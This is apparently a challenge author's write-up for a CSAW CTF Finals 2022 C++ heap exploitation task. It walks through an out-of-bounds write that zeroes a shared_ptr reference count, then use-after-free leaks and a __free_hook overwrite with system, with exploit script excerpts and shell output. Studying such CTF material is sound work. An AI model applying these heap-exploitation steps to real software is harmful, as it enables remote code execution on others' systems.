Description
This blog details a C++ heap exploitation challenge written for CSAW CTF Finals 2022. This challenge incorporates an OOB heap write primitive to corrupt heap metadata, creating a use-after-free (UAF) by clobbering the C++ std::shared_ptr
struct. The challenge is a x86-64 ELF binary linked against glibc v2.31 which does not include heap safe-linking, which was introduced in v2.32. The exploitation strategy would change for glibc 2.32+, as __free_hook
functionality no longer exists in the latest versions.
Vulnerabilities
This program has a single key vulnerability that can yield RCE. The vulnerability is incorrect array (or vector) indexing in the Monster
(or Pastry
) edit_params
function:
void Monster::edit_params() {
long long n;
n = 0;
for (; n < ARRSIZE; n++)
std::cout << n + 1 << ". " << FLAVORS[n] << std::endl;
printf("Choose an flavor to edit: ");
std::cin >> n;
if (n < 0) goto fail;
else {
// vuln here - logic sequence error
// entering index 0 allows an OOB write at quantities[0xff]
n--;
long long s = ARRSIZE;
if (n < s) {
std::cout << "Enter a new quantity: ";
std::cin >> quantities[(uint8_t)n];
return;
}
else { goto fail; }
}
fail:
std::cout << "[ ERROR ] : invalid flavor index\n";
return;
}
As shown above, inputting an index of 0 passes both size checks, because they are done separately while separated by a logical operation (n--
). This results in an OOB heap overwrite at quantities[0xff]
.
C++ Standard Structs
Before diving into the exploit, it is important to review relevant data structures allocated on the heap. The following sections outline std::string
, std::vector
, and std::shared_ptr
.
std::string
std::string* s = new std::string(input)
creates a new allocation on the heap which varies in allocation depending on the input. Any input less than 0x10 bytes receives a 0x30 allocation (0x20 for data, 0x8 for metadata, 0x8 for padding) with the following layout
| -- 1 -- | -- 2 -- | -- 3 -- | -- 4 -- | -- 5 -- | -- 6 -- | -- 7 -- | -- 8 -- |
| pad | chunk metadata |
| ptr to string data | size |
| data .... |
This implies that the ptr in the first quadword points to the address 0x10 bytes below it, and the data immediately follows the ptr, size
preamble.
This layout deviates when the allocation size exceeds 0x10 bytes:
| -- 1 -- | -- 2 -- | -- 3 -- | -- 4 -- | -- 5 -- | -- 6 -- | -- 7 -- | -- 8 -- |
| pad | chunk metadata |
| ptr to string data | size |
| size | blank |
...
| -- 1 -- | -- 2 -- | -- 3 -- | -- 4 -- | -- 5 -- | -- 6 -- | -- 7 -- | -- 8 -- |
| pad | chunk metadata |
| string data... |
| |
...
In this case, the data resides in a different allocation, sized to fit. So, strings smaller than 0x10 bytes fit within the std::string
control block, and any larger string requires an additional allocation which is maintained by the pointer in the control block. This difference is important for heap grooming.
std::vector<T>
Vectors are dynamic objects and thus C++ allocates them on the heap. Because a vector consists of metadata that is a fixed size (a pointer to the data's start, a pointer to the data's end, and a pointer to the total allocation's end), the metadata exists separately from the data and can be stored on the stack or in an object, with a fixed 0x18 size (for 64-bit architectures). Therefore, allocating a vector of a few uint32_t
s results in the following:
metadata (on stack or wihtin dynamically allocated object)
| -- 1 -- | -- 2 -- | -- 3 -- | -- 4 -- | -- 5 -- | -- 6 -- | -- 7 -- | -- 8 -- |
| pad | chunk metadata |
| ptr to data start | ptr to data end |
| ptr to alloc end |
data (on heap)
| -- 1 -- | -- 2 -- | -- 3 -- | -- 4 -- | -- 5 -- | -- 6 -- | -- 7 -- | -- 8 -- |
| pad | chunk metadata |
| int1 | int 2 | int 3 | int 4 | < data end
| | | < allocation end
It is important to note that the pointers may change as the vector size changes - C++ doubles memory every expansion and copies over data to newly allocated chunks, so expanding and / or shrinking vectors does affect heap layout and the allocation / freeing of different size allocations (though these allocation sizes come in regular intervals, e.g.: 0x30, 0x50, 0x90, etc.)
std::shared_ptr
Shared pointers create new heap objects when initialized through make_shared<T>
. These allocations can be thought of as a wrapper around T
, whether that be a primitive data type or a Class
. The allocation takes the following form in memory.
0x00 - 0x08 bytes: shared_ptr vtable
0x08 - 0x0c bytes: shared reference count
0x0c - 0x10 bytes: weak reference count
So long as a shared_ptr
or an object containing one holds a reference to the wrapped data, the shared counter is greater than 0. Every time a shared_ptr
falls out of scope, the binary checks to see if the shared reference count hit 0. If it did, the program frees not only the shared pointer, but also type T
inside it (if applicable).
Using the OOB
Adding any order from the main menu creates a shared_ptr<T>
on the heap where T
is the order type inheriting from base class Order
. For example, allocating a new Monster
order yields the following heap structure:
0x55b73c837a80: 0x0000000000000000 0x0000000000000061 << [ pad , allocation size | FLAGS ]
0x55b73c837a90: 0x000055b73be68980 0x0000000100000002 << [ vtable for shared_ptr<Monster> / weak count ]
0x55b73c837aa0: 0x000055b73be68a58 0x0000001400000021 << [ vtable for Monster, item number / dollars ]
0x55b73c837ab0: 0x0000000000000014 0x0000000000000000 << [ cents , (unused) ]
0x55b73c837ac0: 0x0000000000000001 0x000004d200000000 << [ order state , (unused) / quantities[0] ]
0x55b73c837ad0: 0x00001a85000011d7 0x0000000000000000 << [ quantities[2..3], quantities[4..5 ]
0x55b73c837ae0: 0x0000000000000000 << [ quantities[6..7],
This shows that Monster->quantities
starts at a 0xc boundary, and that quantities[0xff]
falls on a 0x8 boundary (0xc + 0xff * 4 = 0x408
). So the overwrite is a full four-byte clobber on a 0x8 heap chunk boundary. An exploit could perhaps use this to change an allocation size in the heap metadata, but cannot use it for a partial pointer overwrite since cin >> quantities[0xff]
nulls out unused bytes in the uint32_t
.
Instead, the 4-byte OOB can clobber the shared pointer reference count, setting it to 0. Then, the next time the program uses this shared_ptr
it will eventually fall out of scope and trigger cleanup. This leads to a UAF so long as an encompassing data structure maintains access to the shared_ptr
(in this case, an OrderList
). Cleanup includes freeing any standard heap-allocated data structures in the object automatically - so clobbering a shared_ptr<Pastry>
frees its class member variable std::vector<uint32_t> quantities
. However, edit access to that data structure remains from the OrderList
via the Pastry::edit_params
function. The process for setting this up requires some heap feng shui, as shown below. It is important to fill the heap with some 0x30 size chunks, since the UAF (std::vector<uint32_t> quantities
) in the shared_ptr<Pastry>
is a 0x30-sized structure itself (thanks to vector::reserve
in the constructor). Thankfully, the Complaint
object uses string::shrink_to_fit
on its data to allow finer grained heap control. Heap feng shui is important, but not the specific crux of this challenge!
# allocate pastry object which will originate the OOB write
add_monster(33, [1234, 4567, 6789], 20, 20)
# add pastry so that we can free it to populate 0x50 cache, if needed
add_pastry(101, [1234, 4567, 6789], 20, 20)
# fill space, need to align a pastry object 0xff * 4 bytes after
# the array start in a Monster object (0xff * 4), or ~0x3f8 bytes
# each complaint will allocate only a 0x30 chunk, so long as it
# is 0x10 chars or less
# start with a complaint to get the alignment on the heap correct
add_complaint("B" * 0x58)
# allocate a bunch of 0x30 structs, needed for flipping tcache and fastbins
for i in range(10):
add_complaint(chr(i + 0x31))
# add pastry which is target of the overflow
add_pastry(49, [ 0x414243, 0x414243, 0x414243 ], 0, 20)
# overflow editing the original entry, clobbering order #49 shared_ptr control block
edit_monster(33, 0, 0, 20, 20) # overwrites counter of shared pointer instances to 0
Next, the UAF must jump between fastbins (or tcache, if you're daring) and unsorted bins to leak a heap and glibc address, respectively. Fastbins has fewer linked list checks, so it is the safer option versus tcache. Freeing the previously allocated 0x30 complaints populates 0x30 tcache so that the UAF, triggered upon using the shared_ptr
with prep_order()
, sits in fastbins. Dumping the queue at this point tries to print the pastry's std::vector<uint32_t> quantities
, however the vector's data chunk was freed. Therefore, instead of printing uint32_t
quantity values it logs whatever fastbins linked list pointer is in the first quadword, leaking a heap address.
# fill tcache
resolve_complaint(1)
resolve_complaint(1)
resolve_complaint(1)
resolve_complaint(1)
resolve_complaint(1)
resolve_complaint(1)
# free the clobbered shared_ptr by triggering any use, such as moving it to a new state
prep_order(49)
# dump queue, which should print a broken pointer in order #49
leak1 = print_queue()
leak1 = leak1[leak1.find("Order: #49") + len("Order: #49"):]
leak1 = leak1[leak1.find("quantities:") + len("quantities:") + 1:]
leak1 = int(leak1.split("\n")[1].split(" ")[-1]) + \
(int(leak1.split("\n")[2].split(" ")[-1]) << 32)
heap_addr = leak1
Flipping the UAF to smallbins leaks a glibc pointer, since it points at the heap arena instead of fastbins. This requires heap consolidation, which results from creating a very large allocation (such as a 0x2000 byte complaint).
# consolidate heap to dump libc address. This pushes the UAF (in fastbins)
# to smallbins, which links to the main arena
add_complaint("B" * 0x2000)
# leaded address is main_arena + 0x128 (smallbins for 0x30)
leak2 = print_queue()
leak2 = leak2[leak2.find("Order: #49") + len("Order: #49"):]
leak2 = leak2[leak2.find("quantities:") + len("quantities:") + 1:]
leak2 = int(leak2.split("\n")[1].split(" ")[-1]) + \
(int(leak2.split("\n")[2].split(" ")[-1]) << 32)
glibc_addr = leak2
free_hook = glibc_addr + 0x2248
system = free_hook - 0x19cbb8
print(hex(free_hook))
After that, it is a matter of overlapping the UAF with a data structure that extends its capabilities. Overlapping with std::string
control chunk is perfect, because it occupies the same size (0x30 bytes, incl. metadata) on the heap as cached UAF and has a pointer in its first quadword. This is also an easily allocation to make using the Complaint
struct, which is a simple std::string
with variable size, but does require some heap feng shui so that the UAF is allocatable. Once overlapping, overwriting the first two quantities in the UAF clobbers the pointer to the string data. Setting this to __free_hook
's address and then editing the complaint to &system
now diverts execution flow to system(ptr)
for every call to free(ptr)
.
# empty tcache and both 0x30 in smallbins (incl. UAF)
for i in range(7):
add_complaint(chr(i + 0x31))
# move all chunks back to fill tcache and fastbins, with the
# UAF in fastbins
for i in range(7):
resolve_complaint(7)
resolve_complaint(1)
# empty tcache and both 0x30 in smallbins
# this puts the UAF overlapping a string, with the first index pointing to the
# string data
for i in range(9):
add_complaint(chr(i + 0x31))
...
# use the UAF to overwrite the string data pointer to free_hook
# need to do it in two dword overwrites
edit_pastry(49, 1, free_hook & 0xffffffff, 0, 20)
edit_pastry(49, 2, free_hook >> 32, 0, 20)
# edit the complaint, which now points at free hook, to &system
edit_complaint(14, system.to_bytes(8, "little"))
The last step is placing something meaningful to free on the heap so that free(ptr)
calls system(ptr)
without a crash. Using the above background information on std::string
, allocating any data larger than 0x10 bytes results in two allocations: one for the control block and one for the data. In this situation, the first quadword in the control block is simply a pointer to the char*
returned by std:string::c_str()
. Therefore, allocating "/" * 0x30 + "bin/sh"
is perfect, because it creates its own cstr
allocation and is freed first when the std::string
is delete
d. Allocating and freeing this string using a complaint fulfills the needs and results in a remote shell.
# add string that has its own /bin/sh allocation, so pointer points right at c_str
add_complaint("/" * 0x30 + "bin/sh")
...
# free complaint 15 (/////.../bin/sh). It's giving shell
p.send(b'9\n')
p.recvuntil(b"> ")
p.send(b'15\n')
p.interactive()
[+] Opening connection to 127.0.0.1 on port 6666: Done
0x55ba35f28e40
0x7f5949957e48
[*] Switching to interactive mode
$ ls
flag.txt
smoothie_operator
$ cat flag.txt
Sh4r3d_ptrs_R_sm00th$
Testing It Out
The Dockerfile
allows testing locally and "remotely" if desired. The default Dockerfile
hosts the binary on port 6666, similar to a CTF challenge. Simply run:
make build
make host
from one terminal and
cd exp; python3 exploit.py
from another with DEBUG = False
and LOCAL = False
in the exploit script. Toggling these options allows for local testing and debugging within the Docker container using make run
, or on the local filesystem if running Ubuntu 20.04. For debugging, it is recommended to use the commented code in the Dockerfile
to build an environment with pwntools
and gdb
.
Acknowledgements
Congratulations to Shellphish, PPP and Tower of Hanoi for solving this challenge during the CTF! Any future write-ups from their contestants on how they solved this challenge will be linked here.